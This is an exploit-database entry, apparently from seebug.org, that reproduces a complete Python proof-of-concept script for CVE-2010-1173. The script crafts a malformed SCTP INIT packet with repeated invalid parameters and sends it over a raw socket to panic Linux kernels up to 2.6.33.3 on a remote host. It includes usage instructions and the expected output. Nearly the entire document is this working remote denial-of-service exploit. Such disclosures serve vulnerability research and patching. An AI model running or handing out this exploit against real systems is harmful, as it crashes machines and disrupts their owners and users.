Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS

2010-08-1000:00:00

Root

www.seebug.org

0.706 High

EPSS

Percentile

97.7%

JSON

No description provided by source.


                                                # From: http://jon.oberheide.org/files/sctp-boom.py
#!/usr/bin/env python
 
'''
  sctp-boom.py
  
  Linux Kernel &lt;= 2.6.33.3 SCTP INIT Remote DoS
  Jon Oberheide &lt;[email protected]&gt;
  http://jon.oberheide.org
   
  Information:
  
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173
 
    The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
    Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote
    attackers to cause a denial of service (system crash) via an SCTPChunkInit
    packet containing multiple invalid parameters that require a large amount
    of error data.
 
  Usage:
  
    $ python sctp-boom.py 1.2.3.4 19000
    [+] sending malformed SCTP INIT msg to 1.2.3.4:19000
    ...
    [+] kernel should have panicked on remote host 1.2.3.4
 
  Requirements:
     
    * dnet: http://libdnet.sourceforge.net/
    * dpkt: http://code.google.com/p/dpkt/
 
'''
 
import os, sys, socket
 
def err(txt):
    print '[-] error: %s' % txt
    sys.exit(1)
 
def msg(txt):
    print '[+] %s' % txt
 
def usage():
    print &gt;&gt; sys.stderr, 'usage: %s host port' % sys.argv[0]
    sys.exit(1)
 
try:
    import dpkt
except ImportError:
    err('requires dpkt library: http://code.google.com/p/dpkt/')
 
try:
    import dnet
except ImportError:
    try:
        import dumbnet as dnet
    except ImportError:
        err('requires dnet library: http://libdnet.sourceforge.net/')
 
def main():
    if len(sys.argv) != 3:
        usage()
 
    host = sys.argv[1]
    port = int(sys.argv[2])
 
    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')
 
    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip
 
    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
 
    invalid = ''
    invalid += '\x20\x10\x11\x73'
    invalid += '\x00\x00\xf4\x00'
    invalid += '\x00\x05'
    invalid += '\x00\x05'
    invalid += '\x20\x10\x11\x73'
 
    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
 
    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)
 
    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]
 
    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)
 
    print `ip`
 
    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)
 
    msg('kernel should have panicked on remote host %s' % (dst_addr))
 
if __name__ == '__main__':
    main()